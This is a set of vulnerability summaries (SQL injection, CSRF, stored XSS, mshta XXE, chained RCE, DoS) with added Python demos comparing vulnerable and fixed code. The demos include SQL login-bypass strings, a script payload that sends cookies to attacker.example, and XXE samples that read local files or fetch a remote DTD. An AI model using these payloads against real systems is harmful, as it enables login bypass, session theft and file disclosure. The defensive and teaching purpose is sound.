The Nexos theme through 1.7 for WordPress allows side-map/?search_order= SQL Injection.
This exploit targets a vulnerability in the Move Networks Quantum Streaming Player that lets an attacker overwrite a Structured Exception Handler (SEH) record and execute arbitrary code. The exploit is written in JavaScript and carries shellcode that launches calc.exe on Windows XP SP2. The space available for the shellcode is about 400 bytes.
An unauthenticated attacker can use SQL injection to bypass the login check in /admin/checklogin.php of Online Polling System 1.0. The 'myusername' and 'mypassword' parameters are placed into the login query without validation or parameterisation, so a crafted value alters the WHERE clause and lets the attacker log in without valid credentials, gaining access to the administration control panel.
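The bug class above, as an added example that is not code from Online Polling System 1.0: a login check that splices the two parameters into the SQL text, beside the parameterised version. The table schema, column names and the stored credential are assumptions for the demo, and the password is kept in plaintext only to keep the example short.

```python
import sqlite3


def make_db():
    """Constructed in-memory admin table standing in for the real users table.

    Schema, column names and the credential are assumptions for this example;
    the password is stored in plaintext only to keep the demo short.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES ('admin', 'S3cret!')")
    conn.commit()
    return conn


def vulnerable_login(conn, myusername, mypassword):
    """Same bug class as checklogin.php: both parameters are spliced into the SQL text."""
    query = (
        "SELECT username FROM admin WHERE username='" + myusername
        + "' AND password='" + mypassword + "'"
    )
    return conn.execute(query).fetchone() is not None


def hardened_login(conn, myusername, mypassword):
    """Parameterised query: the values are bound as data and never parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM admin WHERE username=? AND password=?",
        (myusername, mypassword),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    # Comment-out payload: the closing quote and the password check become a SQL comment.
    bypass_user = "admin' -- "
    # Tautology payload: OR '1'='1 makes the WHERE clause always true.
    taut = "' OR '1'='1"
    print("vulnerable, real creds:  ", vulnerable_login(db, "admin", "S3cret!"))
    print("vulnerable, comment-out: ", vulnerable_login(db, bypass_user, "wrong"))
    print("vulnerable, tautology:   ", vulnerable_login(db, taut, taut))
    print("hardened, comment-out:   ", hardened_login(db, bypass_user, "wrong"))
    print("hardened, tautology:     ", hardened_login(db, taut, taut))
```

The parameterised form is the fix; input "validation" of the username alone is not, because the quoting rules belong to the database driver, not to the application.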
The web interface on Supermicro X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40 allows remote attackers to exploit a cgi/config_user.cgi CSRF issue to add new admin users.
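The check that a state-changing endpoint such as cgi/config_user.cgi is missing when it is exploitable by CSRF, as an added example written for this page and not Supermicro firmware code: a session-bound synchronizer token plus an exact-match Origin/Referer comparison. The BMC origin, server secret, session id and the form field names are all placeholders assumed for the demo.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Assumed origin of the BMC web interface (placeholder). Any request that
# changes state, such as creating a user, must come from this origin.
ALLOWED_ORIGIN = "https://bmc.example.internal"


def issue_csrf_token(server_secret: bytes, session_id: str) -> str:
    """Synchronizer token bound to the session; the legitimate form embeds it."""
    return hmac.new(server_secret, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(url: str) -> bool:
    """Exact scheme + host[:port] comparison; a prefix check would accept lookalike hosts."""
    got, want = urlsplit(url), urlsplit(ALLOWED_ORIGIN)
    return (got.scheme, got.netloc) == (want.scheme, want.netloc)


def csrf_check(method, headers, form, server_secret, session_id):
    """Return (accepted, reason) for a state-changing request."""
    if method.upper() != "POST":
        return False, "state change must be a POST, not a GET"
    origin = headers.get("Origin") or headers.get("Referer")
    if not origin or not same_origin(origin):
        return False, "missing or cross-site Origin/Referer"
    expected = issue_csrf_token(server_secret, session_id)
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(expected, supplied):
        return False, "missing or invalid CSRF token"
    return True, "accepted"


# Constructed sample requests. The browser attaches the victim's session
# cookie to all of them, so session_id is the same; only what the attacker's
# page can control differs. Field names are placeholders, not the CGI's own.
SECRET = b"server-side-secret"
SESSION = "victim-session-123"
NEW_ADMIN_FORM = {"username": "attacker", "password": "pw", "privilege": "admin"}


def forged_request():
    """Auto-submitted form on an attacker's page: foreign Origin, no token."""
    return csrf_check("POST", {"Origin": "https://attacker.example"},
                      dict(NEW_ADMIN_FORM), SECRET, SESSION)


def lookalike_request():
    """Origin that merely starts with the allowed host name."""
    return csrf_check("POST", {"Origin": "https://bmc.example.internal.attacker.example"},
                      dict(NEW_ADMIN_FORM), SECRET, SESSION)


def legitimate_request():
    """Same-origin form carrying the token issued for this session."""
    form = dict(NEW_ADMIN_FORM, csrf_token=issue_csrf_token(SECRET, SESSION))
    return csrf_check("POST", {"Origin": ALLOWED_ORIGIN}, form, SECRET, SESSION)


if __name__ == "__main__":
    print("forged:    ", forged_request())
    print("lookalike: ", lookalike_request())
    print("legitimate:", legitimate_request())
```

The token check alone is sufficient against CSRF; the Origin comparison is defence in depth, and rejecting requests that carry neither header is the safe default for an admin interface where every client is a modern browser.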
This module chains three vulnerabilities to achieve unauthenticated remote code execution as root. The first flaw is in the LogSettingHandler class of the administrator interface: when parsing the mount_device parameter, the process passes the user-supplied string to a system call without proper validation, which allows command execution as root, but this interface requires authentication. The second flaw is in the proxy service, which listens on port 8080 by default: unauthenticated users can use it to communicate with the product's internal services. The third flaw is in the Apache Solr instance bundled with the product: when parsing the file parameter, the process does not validate the user-supplied path before using it in file operations, allowing disclosure of files readable by the IWSS user. Combined, these flaws let an unauthenticated user execute a terminal command as root. Versions prior to 6.5 SP2 Patch 4 (Build 1901) are affected.
Savsoft Quiz 5 is vulnerable to persistent (stored) cross-site scripting. The insert_user_2 function stores the 'custom' parameter submitted during user registration without sanitising it, and the stored value is later rendered back to other users. Script injected this way runs in the browser of any user who views the value and can steal sensitive information, perform actions on that user's behalf, or deface the website.
Powie's WHOIS WordPress plugin is vulnerable to stored XSS: several fields in the plugin's settings page do not properly sanitise user input. Exploitation requires an authenticated WordPress user, which limits the risk. However, because the injected JavaScript executes on the site's own origin, a lower-privileged user can craft a payload that runs in an administrator's browser and use it to elevate privileges or perform any action an administrator can. All WordPress sites running Powie's WHOIS versions earlier than 0.9.31 are vulnerable.
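Both stored XSS entries above (the Savsoft 'custom' registration field and the Powie's WHOIS settings fields) come down to the same mistake, shown here as an added example that is not code from either project: the stored value is echoed into HTML unchanged, beside the output-encoded form for element content and for a quoted attribute. The dict standing in for the database, the markup around the value and the payloads (attacker.example is a placeholder host) are all constructed for the demo.

```python
import html


def store_field(db, key, raw_value):
    """Constructed stand-in for the database column: the raw value is stored as-is.

    Storing unchanged is acceptable; what must never happen is emitting it
    into HTML without encoding for the context it lands in.
    """
    db[key] = raw_value


def render_vulnerable(db, key):
    """Echoes the stored value straight into element content: stored XSS fires here."""
    return '<td class="custom">' + db[key] + "</td>"


def render_hardened(db, key):
    """HTML-encode for element content; quote=True also neutralises " and '."""
    return '<td class="custom">' + html.escape(db[key], quote=True) + "</td>"


def render_attr_vulnerable(db, key):
    """Same value inside a quoted attribute, unencoded: a " in the value ends the attribute."""
    return '<input name="custom" value="' + db[key] + '">'


def render_attr_hardened(db, key):
    """Attribute context: the quote must be encoded so the value cannot add new attributes."""
    return '<input name="custom" value="' + html.escape(db[key], quote=True) + '">'


# Constructed payloads.
SCRIPT_PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.domain)'


def demo():
    """Return the four renderings for the two payloads so they can be compared."""
    db = {}
    store_field(db, "custom", SCRIPT_PAYLOAD)
    store_field(db, "setting", ATTR_PAYLOAD)
    return {
        "content_vulnerable": render_vulnerable(db, "custom"),
        "content_hardened": render_hardened(db, "custom"),
        "attr_vulnerable": render_attr_vulnerable(db, "setting"),
        "attr_hardened": render_attr_hardened(db, "setting"),
    }


if __name__ == "__main__":
    for name, markup in demo().items():
        print(f"{name:20s} {markup}")
```

In the hardened attribute output the only double quotes left are the four that delimit the two attributes; the payload's quote becomes `&quot;` and the `onfocus` handler stays inert text. In a real WordPress plugin the equivalent calls are esc_html() and esc_attr() at output time.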
Windows mshta.exe processes XML external entities, so opening a specially crafted HTA file can result in local file theft and reconnaissance of the host. The technique places an external entity declaration in XML handled by the HTA, which lets the HTA read local files and exfiltrate their contents with little visible activity.
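A detection-side view of the technique above, as an added example that is not part of the original entry: a scanner that flags HTA files carrying a DOCTYPE with an external entity whose URI reaches the filesystem or the network. The sample HTA, its ActiveX XML object and the file path it references are constructed for the demo; the regex is a heuristic over the file text, not an XML parse, so it also catches declarations buried inside script strings.

```python
import re

# External (and parameter) entity declarations: <!ENTITY name SYSTEM "uri">,
# <!ENTITY % name SYSTEM "uri">, <!ENTITY name PUBLIC "id" "uri">.
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(%\s*)?([\w.:-]+)\s+(SYSTEM|PUBLIC)\s+"
    r"(\"[^\"]*\"|'[^']*')(?:\s+(\"[^\"]*\"|'[^']*'))?",
    re.IGNORECASE,
)
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)

# URI prefixes that reach the local filesystem or the network from an HTA.
RISKY_PREFIXES = ("file:", "http:", "https:", "ftp:", "\\\\", "c:\\", "c:/")


def external_entities(text):
    """Return (entity_name, uri, is_parameter_entity) for each external entity found."""
    found = []
    for m in ENTITY_RE.finditer(text):
        # For PUBLIC the first string is the public id and the second is the URI.
        uri = m.group(5) if m.group(3).upper() == "PUBLIC" and m.group(5) else m.group(4)
        found.append((m.group(2), uri.strip("\"'"), m.group(1) is not None))
    return found


def is_suspicious_hta(text):
    """Heuristic: a DOCTYPE plus at least one external entity pointing at a risky URI."""
    if not DOCTYPE_RE.search(text):
        return False
    return any(uri.lower().startswith(RISKY_PREFIXES) for _, uri, _ in external_entities(text))


# Constructed samples. Microsoft.XMLDOM / loadXML are the usual MSXML entry points
# an HTA would use; the win.ini path is a placeholder target.
XXE_HTA = r'''<html><head><hta:application id="app"></head><body><script>
var doc = new ActiveXObject("Microsoft.XMLDOM");
doc.async = false;
doc.loadXML('<?xml version="1.0"?><!DOCTYPE r [<!ENTITY grab SYSTEM "file:///c:/windows/win.ini">]><r>&grab;</r>');
</script></body></html>'''

PARAM_ENTITY_HTA = r'''<!DOCTYPE r [<!ENTITY % p PUBLIC "-//x//EN" "http://attacker.example/evil.dtd"> %p;]><r/>'''

BENIGN_HTA = '<html><head><hta:application id="app"></head><body>hello</body></html>'

INTERNAL_ENTITY_ONLY = '<!DOCTYPE r [<!ENTITY greet "hello">]><r>&greet;</r>'


if __name__ == "__main__":
    for label, sample in [("xxe", XXE_HTA), ("param", PARAM_ENTITY_HTA),
                          ("benign", BENIGN_HTA), ("internal", INTERNAL_ENTITY_ONLY)]:
        print(f"{label:9s} suspicious={is_suspicious_hta(sample)} entities={external_entities(sample)}")
```

The scanner is a triage aid, not a verdict: an attacker can assemble the entity declaration at runtime from string fragments, so pair it with process telemetry for mshta.exe reading files outside its own directory.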
This script exploits a denial-of-service vulnerability in Grafana 7.0.1: a specially crafted request causes the Grafana server to crash or become unresponsive.